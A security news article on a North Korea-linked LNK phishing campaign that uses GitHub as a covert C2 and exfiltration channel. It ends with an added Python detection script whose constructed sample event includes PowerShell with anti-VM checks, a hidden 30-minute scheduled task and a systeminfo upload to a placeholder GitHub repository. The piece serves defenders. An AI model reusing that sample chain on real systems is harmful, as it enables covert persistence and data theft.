A recent campaign attributed to North Korean state-sponsored groups is using Windows shortcut (LNK) files in targeted phishing attacks against organizations in South Korea. Notably, the campaign uses GitHub, a platform trusted and allowed in most corporate networks, as a covert command-and-control (C2) channel, which makes the operation harder to spot.
GitHub as an Unlikely C2 Channel
Abusing GitHub as a C2 channel is concerning precisely because the platform is so widely trusted in corporate environments: the campaign's traffic blends in with legitimate developer activity and passes controls that rely on blocking untrusted domains. The operation has been active since at least 2024 and has grown in sophistication; early versions used less obfuscated LNK files and were linked to distribution of the XenoRAT malware.
More recent samples embed the decoding routine in the LNK file's command-line arguments and conceal the encoded payload inside the LNK file itself. A decoy PDF is displayed so the user sees what looks like a normal file open, while the malicious script runs in the background.
Targeted Attacks on South Korean Organizations
FortiGuard Labs analyst Cara Lin, who identified the campaign, notes that the decoy PDF titles point at specific South Korean companies, suggesting a broader surveillance effort. Metadata patterns such as the "Hangul Document" naming convention are consistent with techniques used by North Korean groups including Kimsuky, APT37, and Lazarus.
The campaign is rated high severity because the data it collects can enable follow-on attacks. The lures are built around topics relevant to Korean business, such as financial proposals and strategic partnerships, to make them credible.
Long-Term Surveillance and Data Collection
The operation's objective appears to be sustained surveillance and intelligence gathering. A scheduled task that fires every 30 minutes gives the attackers a persistent foothold, and stolen data is written to private GitHub repositories, so the exfiltration traffic looks like ordinary GitHub use and the presence on compromised systems goes unnoticed.
The attack begins when the victim opens what appears to be a PDF but is actually an LNK file, which launches a PowerShell script. After checking that it is not running inside a virtual machine or alongside forensic tools, the script registers a persistent scheduled task, collects system information, and uploads it to the attacker's GitHub repository.
Mitigation and Security Recommendations
Organizations and users should treat unsolicited LNK and PDF files with suspicion regardless of how they look; note that Windows hides the .lnk extension even when other extensions are displayed, so a file named report.pdf.lnk is shown simply as report.pdf. Monitoring for unusual PowerShell or VBScript activity, and investigating unexpected connections to GitHub API endpoints, are key steps in detecting and mitigating this threat.
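The detection advice above (unusual PowerShell activity plus unexpected GitHub API connections) can be turned into a simple triage rule that scores the behaviours described in the attack chain: anti-VM and anti-forensics checks, a 30-minute scheduled task, system-information collection, and an upload to the GitHub API. The following is an added example written for this article, not code from FortiGuard Labs or from the campaign itself. The sample log events are constructed, the indicator patterns and weights are illustrative choices rather than indicators of compromise from the report, and the repository names and file paths are placeholders.

```python
import re
from dataclasses import dataclass, field

# Constructed sample events, modelled on the fields a SIEM would hold after joining
# PowerShell script-block logging (Event ID 4104, ScriptBlockText) with the parent
# image of the powershell.exe that produced the block. The script text is
# illustrative: it mirrors the behaviour described in the article but is NOT the
# campaign's actual code. Repository names and paths are placeholders.
SAMPLE_EVENTS = [
    {
        "record_id": 1001,
        "host": "WS-FIN-07",
        "parent_image": r"C:\Windows\explorer.exe",  # an LNK double-clicked from the desktop
        "script_block": (
            "$m=(Get-WmiObject Win32_ComputerSystem).Model;"
            "if($m -match 'VMware|VirtualBox|Virtual Machine'){exit};"
            "if(Get-Process -Name wireshark,procmon -ErrorAction SilentlyContinue){exit};"
            "schtasks /create /sc minute /mo 30 /tn 'OneDriveSync' "
            "/tr 'powershell -w hidden -f C:\\Users\\Public\\s.ps1' /f;"
            "$info=systeminfo | Out-String;"
            "Invoke-RestMethod -Uri 'https://api.github.com/repos/placeholder-org/placeholder-repo/contents/out.txt' "
            "-Method Put -Headers $h -Body $info"
        ),
    },
    {   # benign: a build host querying GitHub releases
        "record_id": 1002,
        "host": "BUILD-01",
        "parent_image": r"C:\Program Files\Git\bin\git.exe",
        "script_block": "Invoke-RestMethod -Uri 'https://api.github.com/repos/placeholder-org/tool/releases/latest'",
    },
    {   # benign: an admin registering a nightly backup task from the ISE
        "record_id": 1003,
        "host": "ADMIN-02",
        "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe",
        "script_block": (
            "Register-ScheduledTask -TaskName 'NightlyBackup' "
            "-Trigger (New-ScheduledTaskTrigger -Daily -At 2am) "
            "-Action (New-ScheduledTaskAction -Execute 'robocopy.exe')"
        ),
    },
]

# Indicator name -> (pattern, weight). Weights are illustrative; tune them to your
# environment. GitHub API access alone is deliberately low weight because it is
# normal on developer machines; it only matters in combination with the rest.
INDICATORS = {
    "github_api":      (re.compile(r"api\.github\.com|raw\.githubusercontent\.com", re.I), 1),
    "sched_task":      (re.compile(r"schtasks(\.exe)?\s+/create|Register-ScheduledTask|New-ScheduledTaskTrigger", re.I), 2),
    "30min_repeat":    (re.compile(r"/sc\s+minute\s+/mo\s+30|RepetitionInterval\s+\(?New-TimeSpan\s+-Minutes\s+30", re.I), 1),
    "anti_vm":         (re.compile(r"Win32_ComputerSystem|VMware|VirtualBox|Virtual Machine|Hyper-V", re.I), 2),
    "anti_forensics":  (re.compile(r"wireshark|procmon|procexp|x64dbg|ollydbg|fiddler", re.I), 2),
    "hidden_window":   (re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-enc(odedcommand)?\b", re.I), 1),
    "sysinfo_collect": (re.compile(r"systeminfo|Get-ComputerInfo|whoami|ipconfig", re.I), 1),
}


@dataclass
class Finding:
    record_id: int
    host: str
    score: int
    severity: str
    hits: list = field(default_factory=list)


def severity(score):
    """Map a numeric score to a triage bucket (thresholds are an assumption)."""
    if score >= 7:
        return "high"
    if score >= 4:
        return "medium"
    return "low"


def analyze_event(event):
    """Score one script-block event against the indicator table."""
    text = event["script_block"]
    hits = [name for name, (pattern, _) in INDICATORS.items() if pattern.search(text)]
    score = sum(INDICATORS[name][1] for name in hits)
    # A shortcut opened from the desktop or a download folder is spawned by explorer.exe.
    # On its own that is normal, so it only adds weight when other indicators fired.
    if hits and event["parent_image"].lower().endswith("\\explorer.exe"):
        hits.append("spawned_by_explorer")
        score += 1
    return Finding(event["record_id"], event["host"], score, severity(score), hits)


def triage(events):
    """Return findings for all events, highest score first."""
    return sorted((analyze_event(e) for e in events), key=lambda f: f.score, reverse=True)


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.severity:6} score={f.score:2} host={f.host} record={f.record_id} hits={','.join(f.hits)}")
```

In a real deployment the input would be Event ID 4104 records joined with process-creation data (for example Sysmon Event ID 1) rather than the constructed dictionaries above, and the weights would need tuning. The design point is that the GitHub API call is benign on its own; the rule escalates only when it co-occurs with persistence and anti-analysis behaviour, which is what distinguishes this campaign's traffic from a developer's.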
